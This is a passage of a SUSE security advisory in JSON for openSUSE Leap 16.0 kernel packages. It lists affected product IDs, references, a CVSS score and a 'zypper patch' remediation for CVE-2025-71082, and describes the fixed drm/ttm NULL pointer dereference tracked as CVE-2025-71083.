"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
